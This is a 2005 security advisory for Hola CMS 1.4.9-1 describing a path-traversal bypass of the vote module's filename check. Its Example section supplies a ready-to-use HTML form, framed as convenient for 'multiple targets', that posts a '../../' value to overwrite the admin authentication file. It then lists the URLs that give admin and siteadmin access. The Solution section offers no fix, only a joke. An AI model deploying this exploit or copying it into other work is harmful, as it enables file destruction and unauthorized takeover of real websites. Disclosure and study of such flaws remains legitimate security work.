Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access
- - - --------------------------------------------------------------------
Virginity Security Advisory 2005-002
- - - --------------------------------------------------------------------
DATE : 2005-03-13 15:11 GMT
TYPE : remote
VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/)
AUTHOR : Virginity
ADVISORY NUMBER : 004
- - - --------------------------------------------------------------------
Description:
Like the one in SA-2005-001:
A new patched version 1.4.9-1 got released where that issue was marked as
solved.
The Vote-Module(vote_save_results.php) now checks with strpos() wether
the submitted "vote_filename" variable contains "holaDB/votes" at position 0.
BUT! Since we all know how to change directories by typing ../
we can still manipluate or destroy every file on the whole server
by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!!
Below the updated example how to destroy login-authentification file and
gaining access
to admin-functions!
Really sad that the quick patch (released 3? hours after notifcation)
doesn't really work.
Author of the Software has been notified.
- - - --------------------------------------------------------------------
Example:
Create this html form (that makes it easier to use it on multiple targets):
<form action="http://[target]/[site-with-vote].php?vote=1" method="POST">
<input type="hidden" name="vote_filename"
value="holaDB/votes/../../admin/multiuser/multiuser.php">
<input type="hidden" name="result" value="0">
<input type="submit" value="Stimme abgeben" name="button">
</form>
Of course you'll have to edit [target] and [site-with-vote] to match your site!
Now when you push the button the first lines of the multiuser.php (which
includes the authentication mechanism) get overwritten and by calling
http://[target]/admin/index_cms.php
you have access to all user functions.
by calling
http://[target]/admin/[module you want].php?username=siteadmin
to all siteadmin functions!
- - - --------------------------------------------------------------------
Solution:
Use other CMS... i think PHP-Nuke isn't that vulnerable ;)
- - - --------------------------------------------------------------------
Personal note:
YES! The girl did it again :)
Contact me on IRC!
- - - --------------------------------------------------------------------